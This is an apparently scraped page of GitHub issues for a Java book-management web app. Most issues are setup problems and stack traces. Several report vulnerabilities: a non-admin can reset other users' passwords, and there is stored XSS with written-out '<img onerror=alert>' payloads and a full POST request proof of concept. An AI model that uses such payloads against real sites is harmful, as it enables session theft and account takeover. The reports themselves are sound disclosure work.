lovebuildj / book-manager Goto Github PK
View Code? Open in Web Editor NEWJavaWeb图书管理系统,简单易用功能强大,可拓展性高,集成主流框架
License: MIT License
book-manager's People
Contributors
Stargazers
Watchers
Forkers
isperfee 550135928 hnxyy lovepli coding13 yihr qimingnan sevenday2020 guoxianlong lstefanc lijm1206 tiaotiaopig braveryzhangsan kerwen-l charygao ra1no3o aihuasxy athena44x lizhaojie8475 liuhui8899 xfyecn coooolrui zjl183113041 share0307 surookie geralt-x borao78 littlegyup hcloooo liuzun1 yeghost1 youngqqcn seu-github-account tianyafu1991 cwhann jiashunmiao feshfans mjscjj windlifter yunling68 charon-1573 caocaolinzhaoyang aierlaya wjx-da ironsang ljj-dev boyyyye jjjjjjamesharden 15091541971 1125464866 simplechinese beyondzychen zerotx zhutaodegit daohuai0913 gl-guoliang xu-shi qlong8807 wenxuefeng3930 userguozy lix-b daisyliudi february0204 zhangkaivictor daxuefenfeia mpk666 zhudun gz1yyy giaastronaut raybon-lee optional-checker-paper dream-yang yuxhubert codingchaofan yenalyliew panji-tech tanbinh123 meitanzai sophfrank jackabc888666 khaidz zhaosifan123book-manager's Issues
book-manager v1.0.3-Change User Password Vulnerability
Log in by admin, create a account test which is not admin, then log in with test, in the reader page, account test can change any user passowrd by modify user infomations.
change admin's password, then admin cannot log in by the old password
Borrow book has storage xss vulnerability
In borrow page, input ISBN "131e12e" and submit:
The return book page will alert the message:xss1
为什么弄好了之后,启动永远404,可以指点一下吗?
IDEA:2021.3.3
Tomcat:9.0.38
JDK:1.8.0_181
Maven:3.8.1
OS:Windows 10 专业工作站版 19044.1200
MySQL:8.0.28
浏览器打开:
HTTP状态 404 - 未找到
类型 状态报告
消息 请求的资源[/manager_war_exploded/]不可用
描述 源服务器未能找到目标资源的表示或者是不愿公开一个已经存在的资源表示。
Apache Tomcat/9.0.38
Tomcat日志:
"D:\Program Files\apache-tomcat-9.0.38\bin\catalina.bat" run
[2022-03-28 10:16:56,535] 工件 manager:war exploded: 正在等待服务器连接以启动工件部署…
Using CATALINA_BASE: "C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a"
Using CATALINA_HOME: "D:\Program Files\apache-tomcat-9.0.38"
Using CATALINA_TMPDIR: "D:\Program Files\apache-tomcat-9.0.38\temp"
Using JRE_HOME: "D:\Program Files\Java\jdk1.8.0_181"
Using CLASSPATH: "D:\Program Files\apache-tomcat-9.0.38\bin\bootstrap.jar;D:\Program Files\apache-tomcat-9.0.38\bin\tomcat-juli.jar"
Using CATALINA_OPTS: ""
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Server.服务器版本: Apache Tomcat/9.0.38
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 服务器构建: Sep 10 2020 08:20:30 UTC
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 服务器版本号(: 9.0.38.0
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 操作系统名称: Windows 10
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log OS.版本: 10.0
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 架构: amd64
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Java 环境变量: D:\Program Files\Java\jdk1.8.0_181\jre
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Java虚拟机版本: 1.8.0_181-b13
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log JVM.供应商: Oracle Corporation
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_BASE: C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_HOME: D:\Program Files\apache-tomcat-9.0.38
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.util.logging.config.file=C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a\conf\logging.properties
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote=
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote.port=1099
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote.ssl=false
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote.password.file=C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a\jmxremote.password
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote.access.file=C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a\jmxremote.access
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.rmi.server.hostname=127.0.0.1
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djdk.tls.ephemeralDHKeySize=2048
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.protocol.handler.pkgs=org.apache.catalina.webresources
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dignore.endorsed.dirs=
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcatalina.base=C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcatalina.home=D:\Program Files\apache-tomcat-9.0.38
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.io.tmpdir=D:\Program Files\apache-tomcat-9.0.38\temp
28-Mar-2022 10:16:58.043 信息 [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent 使用APR版本[1.7.0]加载了基于APR的Apache Tomcat本机库[1.2.25]。
28-Mar-2022 10:16:58.043 信息 [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent APR功能:IPv6[true]、sendfile[true]、accept filters[false]、random[true]。
28-Mar-2022 10:16:58.043 信息 [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent APR/OpenSSL配置:useAprConnector[false],useOpenSSL[true]
28-Mar-2022 10:16:58.090 信息 [main] org.apache.catalina.core.AprLifecycleListener.initializeSSL OpenSSL成功初始化 [OpenSSL 1.1.1g 21 Apr 2020]
28-Mar-2022 10:16:58.574 信息 [main] org.apache.coyote.AbstractProtocol.init 初始化协议处理器 ["http-nio-8080"]
28-Mar-2022 10:16:58.621 信息 [main] org.apache.catalina.startup.Catalina.load 服务器在[1013]毫秒内初始化
28-Mar-2022 10:16:58.684 信息 [main] org.apache.catalina.core.StandardService.startInternal 正在启动服务[Catalina]
28-Mar-2022 10:16:58.684 信息 [main] org.apache.catalina.core.StandardEngine.startInternal 正在启动 Servlet 引擎:[Apache Tomcat/9.0.38]
28-Mar-2022 10:16:58.699 信息 [main] org.apache.coyote.AbstractProtocol.start 开始协议处理句柄["http-nio-8080"]
28-Mar-2022 10:16:58.699 信息 [main] org.apache.catalina.startup.Catalina.start [84]毫秒后服务器启动
已连接到服务器
[2022-03-28 10:16:58,887] 工件 manager:war exploded: 正在部署工件,请稍候…
28-Mar-2022 10:17:08.722 信息 [Catalina-utility-1] org.apache.catalina.startup.HostConfig.deployDirectory 把web 应用程序部署到目录 [D:\Program Files\apache-tomcat-9.0.38\webapps\manager]
28-Mar-2022 10:17:08.878 信息 [Catalina-utility-1] org.apache.catalina.startup.HostConfig.deployDirectory Web应用程序目录[D:\Program Files\apache-tomcat-9.0.38\webapps\manager]的部署已在[156]毫秒内完成
28-Mar-2022 10:17:08.987 信息 [RMI TCP Connection(4)-127.0.0.1] org.apache.jasper.servlet.TldScanner.scanJars 至少有一个JAR被扫描用于TLD但尚未包含TLD。 为此记录器启用调试日志记录,以获取已扫描但未在其中找到TLD的完整JAR列表。 在扫描期间跳过不需要的JAR可以缩短启动时间和JSP编译时间。
[2022-03-28 10:17:09,128] 工件 manager:war exploded: 工件已成功部署
[2022-03-28 10:17:09,128] 工件 manager:war exploded: 部署已花费 10,241 毫秒
Tomcat Localhost 日志:
28-Mar-2022 10:17:09.128 信息 [RMI TCP Connection(4)-127.0.0.1] org.apache.catalina.core.ApplicationContext.log 1 Spring WebApplicationInitializers detected on classpath
Tomcat Catalina 日志:
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Server.服务器版本: Apache Tomcat/9.0.38
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 服务器构建: Sep 10 2020 08:20:30 UTC
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 服务器版本号(: 9.0.38.0
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 操作系统名称: Windows 10
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log OS.版本: 10.0
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 架构: amd64
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Java 环境变量: D:\Program Files\Java\jdk1.8.0_181\jre
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Java虚拟机版本: 1.8.0_181-b13
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log JVM.供应商: Oracle Corporation
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_BASE: C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_HOME: D:\Program Files\apache-tomcat-9.0.38
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.util.logging.config.file=C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a\conf\logging.properties
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote=
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote.port=1099
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote.ssl=false
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote.password.file=C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a\jmxremote.password
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote.access.file=C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a\jmxremote.access
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.rmi.server.hostname=127.0.0.1
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djdk.tls.ephemeralDHKeySize=2048
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.protocol.handler.pkgs=org.apache.catalina.webresources
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dignore.endorsed.dirs=
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcatalina.base=C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcatalina.home=D:\Program Files\apache-tomcat-9.0.38
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.io.tmpdir=D:\Program Files\apache-tomcat-9.0.38\temp
28-Mar-2022 10:16:58.043 信息 [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent 使用APR版本[1.7.0]加载了基于APR的Apache Tomcat本机库[1.2.25]。
28-Mar-2022 10:16:58.043 信息 [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent APR功能:IPv6[true]、sendfile[true]、accept filters[false]、random[true]。
28-Mar-2022 10:16:58.043 信息 [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent APR/OpenSSL配置:useAprConnector[false],useOpenSSL[true]
28-Mar-2022 10:16:58.090 信息 [main] org.apache.catalina.core.AprLifecycleListener.initializeSSL OpenSSL成功初始化 [OpenSSL 1.1.1g 21 Apr 2020]
28-Mar-2022 10:16:58.574 信息 [main] org.apache.coyote.AbstractProtocol.init 初始化协议处理器 ["http-nio-8080"]
28-Mar-2022 10:16:58.621 信息 [main] org.apache.catalina.startup.Catalina.load 服务器在[1013]毫秒内初始化
28-Mar-2022 10:16:58.684 信息 [main] org.apache.catalina.core.StandardService.startInternal 正在启动服务[Catalina]
28-Mar-2022 10:16:58.684 信息 [main] org.apache.catalina.core.StandardEngine.startInternal 正在启动 Servlet 引擎:[Apache Tomcat/9.0.38]
28-Mar-2022 10:16:58.699 信息 [main] org.apache.coyote.AbstractProtocol.start 开始协议处理句柄["http-nio-8080"]
28-Mar-2022 10:16:58.699 信息 [main] org.apache.catalina.startup.Catalina.start [84]毫秒后服务器启动
28-Mar-2022 10:17:08.722 信息 [Catalina-utility-1] org.apache.catalina.startup.HostConfig.deployDirectory 把web 应用程序部署到目录 [D:\Program Files\apache-tomcat-9.0.38\webapps\manager]
28-Mar-2022 10:17:08.878 信息 [Catalina-utility-1] org.apache.catalina.startup.HostConfig.deployDirectory Web应用程序目录[D:\Program Files\apache-tomcat-9.0.38\webapps\manager]的部署已在[156]毫秒内完成
28-Mar-2022 10:17:08.987 信息 [RMI TCP Connection(4)-127.0.0.1] org.apache.jasper.servlet.TldScanner.scanJars 至少有一个JAR被扫描用于TLD但尚未包含TLD。 为此记录器启用调试日志记录,以获取已扫描但未在其中找到TLD的完整JAR列表。 在扫描期间跳过不需要的JAR可以缩短启动时间和JSP编译时间。
Add book has storage xss vulnerability
Add a book info,book name input <img src=1 onerror=alert("xss1") />
Then the book list page alert the message: xss1
Add reader has storage xss vulnerability
Use fiddler to mock a request to add reader:
then the message "xss2" popup will be on reader list page:
the poc is :
`POST http://localhost:8080/user/addReader
Host: localhost:8080
Connection: keep-alive
Content-Length: 165
sec-ch-ua: "Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111"
Accept: /
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/reader/reader-add
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: remember-me=YWRtaW46MTY4MDAxMTIyNDI0OTozODUzZDZkM2ExOWM5ZGFjZjQxMTljODBhMDhiNTU4Yw; JSESSIONID=E6CB8F800264AE98BAED6BFC9195E0FC
Request Body
{"nickname":"<img src=1 onerror=alert("xss2") />","username":"test001","password":"123456","birthday":"","tel":"","email":"","address":"","size":"","identity":"2"}
`
maven镜像仓库问题
博主你用的maven的镜像仓库是哪个,我用的阿里云的镜像。但是好像没有 spring-boot-starter-parent 这个 2.3.1-RELEASE.能分享下你的setting.xml文件吗
登录期间发生错误
Hibernate: select users0_.id as id1_2_, users0_.address as address2_2_, users0_.avatar as avatar3_2_, users0_.birthday as birthday4_2_, users0_.email as email5_2_, users0_.identity as identity6_2_, users0_.is_admin as is_admin7_2_, users0_.nickname as nickname8_2_, users0_.password as password9_2_, users0_.size as size10_2_, users0_.tel as tel11_2_, users0_.username as usernam12_2_ from users users0_ where users0_.username=?
2020-10-09 14:35:42.095 ERROR 8112 --- [nio-8080-exec-1] w.a.UsernamePasswordAuthenticationFilter : An internal error occurred while trying to authenticate the user.
org.springframework.security.authentication.InternalAuthenticationServiceException: null
at org.springframework.security.authentication.dao.DaoAuthenticationProvider.retrieveUser(DaoAuthenticationProvider.java:123) ~[spring-security-core-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.security.authentication.dao.AbstractUserDetailsAuthenticationProvider.authenticate(AbstractUserDetailsAuthenticationProvider.java:144) ~[spring-security-core-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.security.authentication.ProviderManager.authenticate(ProviderManager.java:199) ~[spring-security-core-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.security.authentication.ProviderManager.authenticate(ProviderManager.java:219) ~[spring-security-core-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.security.web.authentication.UsernamePasswordAuthenticationFilter.attemptAuthentication(UsernamePasswordAuthenticationFilter.java:95) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.security.web.authentication.AbstractAuthenticationProcessingFilter.doFilter(AbstractAuthenticationProcessingFilter.java:212) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:334) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.security.web.authentication.logout.LogoutFilter.doFilter(LogoutFilter.java:116) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:334) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.security.web.header.HeaderWriterFilter.doHeadersAfter(HeaderWriterFilter.java:92) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.security.web.header.HeaderWriterFilter.doFilterInternal(HeaderWriterFilter.java:77) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:334) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.security.web.context.SecurityContextPersistenceFilter.doFilter(SecurityContextPersistenceFilter.java:105) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:334) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.security.web.context.request.async.WebAsyncManagerIntegrationFilter.doFilterInternal(WebAsyncManagerIntegrationFilter.java:56) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:334) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.security.web.FilterChainProxy.doFilterInternal(FilterChainProxy.java:215) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.security.web.FilterChainProxy.doFilter(FilterChainProxy.java:178) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
at org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:358) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
at org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:271) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:202) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:139) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:74) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:373) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:868) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1590) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130) ~[na:na]
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630) ~[na:na]
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
at java.base/java.lang.Thread.run(Thread.java:832) ~[na:na]
Caused by: java.lang.NullPointerException: null
at com.book.manager.service.UserService.loadUserByUsername(UserService.java:109) ~[classes/:na]
at com.book.manager.service.UserService$$FastClassBySpringCGLIB$$11192418.invoke(<generated>) ~[classes/:na]
at org.springframework.cglib.proxy.MethodProxy.invoke(MethodProxy.java:218) ~[spring-core-5.2.7.RELEASE.jar:5.2.7.RELEASE]
at org.springframework.aop.framework.CglibAopProxy$DynamicAdvisedInterceptor.intercept(CglibAopProxy.java:687) ~[spring-aop-5.2.7.RELEASE.jar:5.2.7.RELEASE]
at com.book.manager.service.UserService$$EnhancerBySpringCGLIB$$adfa67b1.loadUserByUsername(<generated>) ~[classes/:na]
at org.springframework.security.authentication.dao.DaoAuthenticationProvider.retrieveUser(DaoAuthenticationProvider.java:108) ~[spring-security-core-5.3.3.RELEASE.jar:5.3.3.RELEASE]
... 51 common frames omitted
jdk版本:1.8.0_251
MySQL版本: 8.0
以下是改动内容.
Security concern
Hello 👋
I run a security community that finds and fixes vulnerabilities in OSS. A researcher (@achiove) has found a potential issue, which I would be eager to share with you.
Could you add a SECURITY.md file with an e-mail address for me to send further details to? GitHub recommends a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future.
Looking forward to hearing from you 👍
(cc @huntr-helper)
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.